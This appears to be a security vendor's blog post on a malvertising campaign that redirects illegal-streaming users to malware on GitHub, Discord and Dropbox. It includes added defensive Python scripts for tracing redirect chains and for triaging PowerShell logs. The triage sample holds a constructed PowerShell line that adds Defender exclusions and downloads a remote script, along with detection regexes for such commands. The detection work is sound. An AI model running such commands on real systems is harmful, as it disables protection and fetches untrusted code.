A massive malvertising campaign has been identified that has infected nearly 1 million devices with malware since December 2024. Malvertising is the term used for advertisements that redirect users to a malicious website where credentials are stolen (phishing) or malware is downloaded. The malicious adverts are often submitted to legitimate ad networks, which then push them out to the websites in the network. As such, malicious adverts can be displayed on many legitimate websites, which lends the adverts an appearance of legitimacy.
This campaign targets individuals who use illegal streaming websites. Malvertising redirectors embedded in the streaming sites send visitors to GitHub, Discord, or Dropbox via one or more intermediary websites. Clicking the advertisement takes the user to GitHub through a chain of four or five redirects, the first of which is embedded within an iframe on the streaming website.
The first-stage payload is hosted on GitHub, where most users are redirected, although the first stage has also been identified on Discord and Dropbox. The first stage drops second-stage files, which perform system discovery and exfiltrate the results over HTTP. Data collected by the second-stage files includes information about the device, such as the operating system, memory size, user paths, screen resolution, and graphics information.
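The redirection chain described above (an iframe on the streaming site, several intermediary redirectors, then a file download from GitHub, Discord, or Dropbox) can be reconstructed from web-proxy logs. The Python script below is an added example, not code from the article or from Microsoft's report: it walks Referer links backwards from each executable download served by a file-hosting service and flags chains that start on a streaming-category site and pass through several intermediary hosts. The log lines, client addresses, streaming and redirector hostnames, and the category table are all constructed for illustration; the concrete hosting-service domains are assumed, only the services themselves (GitHub, Discord, Dropbox) come from the article.

```python
"""Reconstruct ad-redirect chains from web-proxy logs (added example).

Log format assumed here (constructed): "client status url referer",
with "-" when the request carried no Referer header.
"""
from urllib.parse import urlparse

# Constructed category data: what the web filter classes as "streaming".
STREAMING_HOSTS = {"free-movies.example", "watch-now.example"}
# Assumed hostnames for the hosting services the article names.
HOSTING_SERVICES = {
    "github.com", "raw.githubusercontent.com", "objects.githubusercontent.com",
    "cdn.discordapp.com", "discord.com",
    "www.dropbox.com", "dl.dropboxusercontent.com",
}
EXECUTABLE_EXT = (".exe", ".msi", ".scr", ".bat", ".ps1", ".js", ".hta", ".zip")
MAX_HOPS = 10  # guard against Referer loops in noisy logs

# Constructed proxy log. Client 10.0.0.5 follows the malvertising chain;
# client 10.0.0.7 downloads a GitHub release from an intranet wiki page.
SAMPLE_LOG = """\
10.0.0.5 200 https://free-movies.example/watch?id=42 -
10.0.0.5 200 https://ads-frame.example/show?zone=7 https://free-movies.example/watch?id=42
10.0.0.5 200 https://track.redir-one.example/r?c=9 https://ads-frame.example/show?zone=7
10.0.0.5 200 https://go.redir-two.example/l https://track.redir-one.example/r?c=9
10.0.0.5 200 https://github.com/acct/repo/releases/download/v1/Setup.exe https://go.redir-two.example/l
10.0.0.7 200 https://github.com/acct/repo/releases/download/v1/tool.zip https://intranet.example/wiki
10.0.0.9 200 https://docs.example/guide.html -
"""


def parse_log(text):
    """Return a list of (client, status, url, referer) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, status, url, referer = line.split()
        records.append((client, int(status), url, referer))
    return records


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def is_payload_download(url):
    """Executable-looking file fetched from one of the hosting services."""
    return host_of(url) in HOSTING_SERVICES and urlparse(url).path.lower().endswith(EXECUTABLE_EXT)


def redirect_chains(records):
    """For every payload download, walk Referer links back (per client)
    until a page with no Referer is reached. Chains are listed download-first."""
    referer_of = {}  # (client, url) -> referer of the first request seen
    for client, _status, url, referer in records:
        referer_of.setdefault((client, url), referer)
    chains = []
    for client, _status, url, referer in records:
        if not is_payload_download(url):
            continue
        chain, seen, cur = [url], {url}, referer
        while cur != "-" and cur not in seen and len(chain) < MAX_HOPS:
            chain.append(cur)
            seen.add(cur)
            cur = referer_of.get((client, cur), "-")
        chains.append((client, chain))
    return chains


def suspicious_chains(records, min_hosts=3):
    """Flag downloads whose chain originates on a streaming site and spans
    at least `min_hosts` distinct hosts (origin, redirectors, hosting service)."""
    alerts = []
    for client, chain in redirect_chains(records):
        hosts = [host_of(u) for u in chain]
        origin = hosts[-1]
        if origin in STREAMING_HOSTS and len(set(hosts)) >= min_hosts:
            alerts.append({
                "client": client,
                "origin": origin,
                "payload": chain[0],
                "hops": len(chain) - 1,
                "chain": list(reversed(chain)),  # origin -> ... -> payload
            })
    return alerts


if __name__ == "__main__":
    for alert in suspicious_chains(parse_log(SAMPLE_LOG)):
        print(f"{alert['client']}: {alert['hops']} hops from {alert['origin']}")
        for hop in alert["chain"]:
            print("   ", hop)
```

Two caveats. The walk relies on each hop setting its own Referer, which holds for JavaScript and meta-refresh redirects but not for HTTP 3xx redirects, where the browser carries the original referrer forward; for those, correlate on the proxy's Location field or on request timing instead. Also, the legitimate GitHub release fetched from an intranet page (the second client in the sample) walks back to a non-streaming origin and is left alone, so populate STREAMING_HOSTS from the web filter's own category data rather than maintaining it by hand.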
Third-stage payloads are then selected and delivered based on the information the second-stage files collected. The third stage establishes a connection to the command-and-control (C2) server, exfiltrates sensitive data from the device, and leads to a fourth stage: an AutoIT binary that uses PowerShell to open files, facilitate data exfiltration, add exclusions to Microsoft Defender so that the dropped files are not scanned, drop a remote access Trojan, and enumerate installed security software and other applications.
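The fourth-stage behaviour above, PowerShell adding Microsoft Defender exclusions and fetching further files from a hosting service, leaves a trace in PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, which has to be enabled by policy). The Python triage below is an added example, not code from the article or from Microsoft: it scores constructed script-block records on three signals, an Add-MpPreference exclusion change, a download from one of the named hosting services, and a PowerShell parent process running from a user-writable path. The sample records, user names, paths and URLs are constructed; the hosting-service hostnames are assumed.

```python
"""Triage PowerShell script-block records for Defender-exclusion abuse (added example)."""
import re

# Hosting services the article names as first-stage hosts; hostnames assumed.
HOSTING_RE = re.compile(
    r"https?://(?:[\w.-]+\.)?(?:github\.com|githubusercontent\.com|discord\.com|"
    r"discordapp\.com|dropbox\.com|dropboxusercontent\.com)/", re.I)
# Add-MpPreference with one of its exclusion parameters (real cmdlet/parameters).
EXCLUSION_RE = re.compile(
    r"\bAdd-MpPreference\b[^;\n|]*?-Exclusion(?:Path|Process|Extension)\b", re.I)
# Common PowerShell download primitives.
DOWNLOAD_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer)\b"
    r"|\.Download(?:File|String)\(", re.I)
# Locations a standard user can write to; a PowerShell parent there is unusual.
USER_WRITABLE_RE = re.compile(
    r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Users\\Public|Windows\\Temp)\\", re.I)

SEVERITY_ORDER = {"high": 0, "review": 1, "low": 2}

# Constructed records shaped like Event ID 4104 ScriptBlockText, joined with the
# parent process from a correlated process-creation event (e.g. Sysmon Event 1).
SAMPLE_SCRIPT_BLOCKS = [
    # An administrator excluding a backup directory from an elevated console.
    {"id": 1, "user": r"CORP\admin.jane",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "text": r"Add-MpPreference -ExclusionPath 'D:\SQLBackups'"},
    # The shape described in the article: a binary in a temp folder drives
    # PowerShell to exclude its own folder and pull more content from GitHub.
    {"id": 2, "user": r"CORP\mark",
     "parent": r"C:\Users\mark\AppData\Local\Temp\Updater.exe",
     "text": r"Add-MpPreference -ExclusionPath $env:LOCALAPPDATA\Temp -ExclusionExtension 'exe'; "
             r"Invoke-WebRequest 'https://github.com/acct/repo/raw/main/s.ps1' -OutFile $env:TEMP\s.ps1"},
    # Ordinary inventory query; no signal.
    {"id": 3, "user": r"CORP\mark",
     "parent": r"C:\Windows\explorer.exe",
     "text": r"Get-CimInstance Win32_ComputerSystem | Select-Object TotalPhysicalMemory"},
]


def score_script_block(entry):
    """Return (severity, reasons) for one record.

    An exclusion change alone is legitimate admin activity often enough that it
    is only marked for review; combined with another signal it becomes high.
    """
    text, parent = entry["text"], entry.get("parent", "")
    reasons = []
    if EXCLUSION_RE.search(text):
        reasons.append("adds a Microsoft Defender exclusion")
    if DOWNLOAD_RE.search(text) and HOSTING_RE.search(text):
        reasons.append("downloads from a file-hosting service")
    if USER_WRITABLE_RE.search(parent):
        reasons.append("PowerShell parent runs from a user-writable path")
    if not reasons:
        return "none", reasons
    exclusion = reasons[0].startswith("adds a Microsoft Defender exclusion")
    if exclusion and len(reasons) >= 2:
        return "high", reasons
    if exclusion:
        return "review", reasons
    return "low", reasons


def triage(entries):
    """Score every record and return the flagged ones, most severe first."""
    flagged = []
    for entry in entries:
        severity, reasons = score_script_block(entry)
        if severity != "none":
            flagged.append({"id": entry["id"], "user": entry["user"],
                            "severity": severity, "reasons": reasons})
    flagged.sort(key=lambda f: SEVERITY_ORDER[f["severity"]])
    return flagged


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{finding['severity']}] record {finding['id']} ({finding['user']}): "
              + "; ".join(finding["reasons"]))
```

Add-MpPreference is also how administrators legitimately add exclusions, which is why an exclusion change on its own only lands in the review queue and escalates when paired with a download from a hosting service or an unusual parent process. The complementary live check on a host is `Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess, ExclusionExtension`, compared against the exclusion baseline the endpoint team approved.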
The campaign has been attributed to a threat group tracked by Microsoft Threat Intelligence as Storm-0408. The group is known to conduct phishing campaigns, search engine optimization (SEO) poisoning, and malvertising to deliver remote access trojans and information stealers for data theft. Malware known to be delivered in the malvertising campaign includes the commodity information stealers Lumma Stealer and Doenerium and the remote access trojan NetSupport RAT. The attacks are indiscriminate, targeting users of illegal streaming services rather than specific industries, with victims including consumers and enterprise employees.
There are several steps that enterprises can take to protect against malvertising, one of the most effective being a web filtering solution. The WebTitan DNS filter can be used to prevent users from visiting certain categories of websites, such as streaming sites and other high-risk websites. Illegal streaming services often host malware, so blocking access can prevent malware infections and enterprises can reduce legal risk by stopping employees from illegally streaming pirated content on company IP addresses. WebTitan can also be configured to block downloads of certain file types from the Internet, such as executable files that are used to install malware. Blocking these file downloads can also help enterprises control shadow IT – software not authorized by the IT department.
Security awareness training should also be provided to the workforce to help eradicate risky practices and raise awareness of threats such as phishing, malvertising, and malware. TitanHQ’s security awareness training program, SafeTitan, makes it easy to create and update training courses that teach security best practices and reduce susceptibility to the full range of cyber threats, and to conduct phishing simulations. Give the TitanHQ team a call today for more information on protecting against malware and other cyber threats, or take advantage of a free trial of TitanHQ’s cybersecurity solutions and see for yourself the difference they make and how easy they are to use.